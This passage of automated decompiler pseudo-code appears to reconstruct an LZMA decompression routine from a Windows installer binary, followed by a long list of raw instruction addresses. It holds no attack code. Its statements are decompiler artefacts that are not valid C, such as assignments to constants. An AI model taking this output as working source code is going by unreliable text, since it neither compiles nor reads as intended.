													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                                                                                    0x00000000
                                                                                                                    0x00406473
                                                                                                                    0x00406473
                                                                                                                    0x00406477
                                                                                                                    0x00406498
                                                                                                                    0x0040649f
                                                                                                                    0x004064a5
                                                                                                                    0x004064ab
                                                                                                                    0x004064bd
                                                                                                                    0x004064c3
                                                                                                                    0x004064c8
                                                                                                                    0x00000000
                                                                                                                    0x00406479
                                                                                                                    0x0040647f
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00406843
                                                                                                                    0x00406843
                                                                                                                    0x00406843
                                                                                                                    0x00406849
                                                                                                                    0x0040684f
                                                                                                                    0x00406855
                                                                                                                    0x0040686f
                                                                                                                    0x00406872
                                                                                                                    0x00406878
                                                                                                                    0x00406883
                                                                                                                    0x00406885
                                                                                                                    0x00406857
                                                                                                                    0x00406857
                                                                                                                    0x00406866
                                                                                                                    0x0040686a
                                                                                                                    0x0040686a
                                                                                                                    0x0040688f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406891
                                                                                                                    0x00406895
                                                                                                                    0x00406a44
                                                                                                                    0x00406a5a
                                                                                                                    0x00406a62
                                                                                                                    0x00406a69
                                                                                                                    0x00406a6b
                                                                                                                    0x00406a72
                                                                                                                    0x00406a76
                                                                                                                    0x00406a76
                                                                                                                    0x004068a1
                                                                                                                    0x004068a8
                                                                                                                    0x004068b0
                                                                                                                    0x004068b3
                                                                                                                    0x004068b6
                                                                                                                    0x004068b6
                                                                                                                    0x004068bc
                                                                                                                    0x004068bc
                                                                                                                    0x00406058
                                                                                                                    0x00406058
                                                                                                                    0x00406058
                                                                                                                    0x00406061
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406067
                                                                                                                    0x00000000
                                                                                                                    0x00406072
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040607b
                                                                                                                    0x0040607e
                                                                                                                    0x00406081
                                                                                                                    0x00406085
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040608b
                                                                                                                    0x0040608e
                                                                                                                    0x00406090
                                                                                                                    0x00406091
                                                                                                                    0x00406094
                                                                                                                    0x00406096
                                                                                                                    0x00406097
                                                                                                                    0x00406099
                                                                                                                    0x0040609c
                                                                                                                    0x004060a1
                                                                                                                    0x004060a6
                                                                                                                    0x004060af
                                                                                                                    0x004060c2
                                                                                                                    0x004060c5
                                                                                                                    0x004060d1
                                                                                                                    0x004060f9
                                                                                                                    0x004060fb
                                                                                                                    0x00406109
                                                                                                                    0x00406109
                                                                                                                    0x0040610d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004060fd
                                                                                                                    0x004060fd
                                                                                                                    0x00406100
                                                                                                                    0x00406101
                                                                                                                    0x00406101
                                                                                                                    0x00000000
                                                                                                                    0x004060fd
                                                                                                                    0x004060d7
                                                                                                                    0x004060dc
                                                                                                                    0x004060dc
                                                                                                                    0x004060e5
                                                                                                                    0x004060ed
                                                                                                                    0x004060f0
                                                                                                                    0x00000000
                                                                                                                    0x004060f6
                                                                                                                    0x004060f6
                                                                                                                    0x00000000
                                                                                                                    0x004060f6
                                                                                                                    0x00000000
                                                                                                                    0x00406113
                                                                                                                    0x00406113
                                                                                                                    0x00406117
                                                                                                                    0x004069c3
                                                                                                                    0x00000000
                                                                                                                    0x004069c3
                                                                                                                    0x00406120
                                                                                                                    0x00406130
                                                                                                                    0x00406133
                                                                                                                    0x00406136
                                                                                                                    0x00406136
                                                                                                                    0x00406136
                                                                                                                    0x00406139
                                                                                                                    0x0040613d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040613f
                                                                                                                    0x00406145
                                                                                                                    0x0040616f
                                                                                                                    0x00406175
                                                                                                                    0x0040617c
                                                                                                                    0x00000000
                                                                                                                    0x0040617c
                                                                                                                    0x0040614b
                                                                                                                    0x0040614e
                                                                                                                    0x00406153
                                                                                                                    0x00406153
                                                                                                                    0x0040615e
                                                                                                                    0x00406166
                                                                                                                    0x00406169
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004061ae
                                                                                                                    0x004061b4
                                                                                                                    0x004061b7
                                                                                                                    0x004061c4
                                                                                                                    0x004061cc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406183
                                                                                                                    0x00406183
                                                                                                                    0x00406187
                                                                                                                    0x004069d2
                                                                                                                    0x00000000
                                                                                                                    0x004069d2
                                                                                                                    0x00406193
                                                                                                                    0x0040619e
                                                                                                                    0x0040619e
                                                                                                                    0x0040619e
                                                                                                                    0x004061a1
                                                                                                                    0x004061a4
                                                                                                                    0x004061a7
                                                                                                                    0x004061ac
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406843
                                                                                                                    0x00406843
                                                                                                                    0x00406849
                                                                                                                    0x0040684f
                                                                                                                    0x00406855
                                                                                                                    0x0040686f
                                                                                                                    0x00406872
                                                                                                                    0x00406878
                                                                                                                    0x00406883
                                                                                                                    0x00406885
                                                                                                                    0x00406857
                                                                                                                    0x00406857
                                                                                                                    0x00406866
                                                                                                                    0x0040686a
                                                                                                                    0x0040686a
                                                                                                                    0x0040688f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004061d4
                                                                                                                    0x004061d6
                                                                                                                    0x004061d9
                                                                                                                    0x0040624a
                                                                                                                    0x0040624d
                                                                                                                    0x00406250
                                                                                                                    0x00406257
                                                                                                                    0x00406261
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00406840
                                                                                                                    0x004061db
                                                                                                                    0x004061df
                                                                                                                    0x004061e2
                                                                                                                    0x004061e4
                                                                                                                    0x004061e7
                                                                                                                    0x004061ea
                                                                                                                    0x004061ec
                                                                                                                    0x004061ef
                                                                                                                    0x004061f1
                                                                                                                    0x004061f6
                                                                                                                    0x004061f9
                                                                                                                    0x004061fc
                                                                                                                    0x00406200
                                                                                                                    0x00406207
                                                                                                                    0x0040620a
                                                                                                                    0x00406211
                                                                                                                    0x00406215
                                                                                                                    0x0040621d
                                                                                                                    0x0040621d
                                                                                                                    0x0040621d
                                                                                                                    0x00406217
                                                                                                                    0x00406217
                                                                                                                    0x00406217
                                                                                                                    0x0040620c
                                                                                                                    0x0040620c
                                                                                                                    0x0040620c
                                                                                                                    0x00406221
                                                                                                                    0x00406224
                                                                                                                    0x00406242
                                                                                                                    0x00406244
                                                                                                                    0x00000000
                                                                                                                    0x00406226
                                                                                                                    0x00406226
                                                                                                                    0x00406229
                                                                                                                    0x0040622c
                                                                                                                    0x0040622f
                                                                                                                    0x00406231
                                                                                                                    0x00406231
                                                                                                                    0x00406231
                                                                                                                    0x00406234
                                                                                                                    0x00406237
                                                                                                                    0x00406239
                                                                                                                    0x0040623a
                                                                                                                    0x0040623d
                                                                                                                    0x00000000
                                                                                                                    0x0040623d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004064dd
                                                                                                                    0x004064e1
                                                                                                                    0x00406504
                                                                                                                    0x00406507
                                                                                                                    0x0040650a
                                                                                                                    0x00406514
                                                                                                                    0x004064e3
                                                                                                                    0x004064e3
                                                                                                                    0x004064e6
                                                                                                                    0x004064e9
                                                                                                                    0x004064ec
                                                                                                                    0x004064f9
                                                                                                                    0x004064fc
                                                                                                                    0x004064fc
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00406520
                                                                                                                    0x00406524
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040652a
                                                                                                                    0x0040652e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406534
                                                                                                                    0x00406536
                                                                                                                    0x0040653a
                                                                                                                    0x0040653a
                                                                                                                    0x0040653d
                                                                                                                    0x00406541
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406591
                                                                                                                    0x00406595
                                                                                                                    0x0040659c
                                                                                                                    0x0040659f
                                                                                                                    0x004065a2
                                                                                                                    0x004065ac
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00406597
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004065b8
                                                                                                                    0x004065bc
                                                                                                                    0x004065c3
                                                                                                                    0x004065c6
                                                                                                                    0x004065c9
                                                                                                                    0x004065be
                                                                                                                    0x004065be
                                                                                                                    0x004065be
                                                                                                                    0x004065cc
                                                                                                                    0x004065cf
                                                                                                                    0x004065d2
                                                                                                                    0x004065d2
                                                                                                                    0x004065d5
                                                                                                                    0x004065d8
                                                                                                                    0x004065db
                                                                                                                    0x004065db
                                                                                                                    0x004065de
                                                                                                                    0x004065e5
                                                                                                                    0x004065ea
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406678
                                                                                                                    0x00406678
                                                                                                                    0x0040667c
                                                                                                                    0x00406a1a
                                                                                                                    0x00000000
                                                                                                                    0x00406a1a
                                                                                                                    0x00406682
                                                                                                                    0x00406685
                                                                                                                    0x00406688
                                                                                                                    0x0040668c
                                                                                                                    0x0040668f
                                                                                                                    0x00406695
                                                                                                                    0x00406697
                                                                                                                    0x00406697
                                                                                                                    0x00406697
                                                                                                                    0x0040669a
                                                                                                                    0x0040669d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040626d
                                                                                                                    0x0040626d
                                                                                                                    0x00406271
                                                                                                                    0x004069de
                                                                                                                    0x00000000
                                                                                                                    0x004069de
                                                                                                                    0x00406277
                                                                                                                    0x0040627a
                                                                                                                    0x0040627d
                                                                                                                    0x00406281
                                                                                                                    0x00406284
                                                                                                                    0x0040628a
                                                                                                                    0x0040628c
                                                                                                                    0x0040628c
                                                                                                                    0x0040628c
                                                                                                                    0x0040628f
                                                                                                                    0x00406292
                                                                                                                    0x00406292
                                                                                                                    0x00406295
                                                                                                                    0x00406298
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040629e
                                                                                                                    0x004062a4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004062aa
                                                                                                                    0x004062aa
                                                                                                                    0x004062ae
                                                                                                                    0x004062b1
                                                                                                                    0x004062b4
                                                                                                                    0x004062b7
                                                                                                                    0x004062ba
                                                                                                                    0x004062bb
                                                                                                                    0x004062be
                                                                                                                    0x004062c0
                                                                                                                    0x004062c6
                                                                                                                    0x004062c9
                                                                                                                    0x004062cc
                                                                                                                    0x004062cf
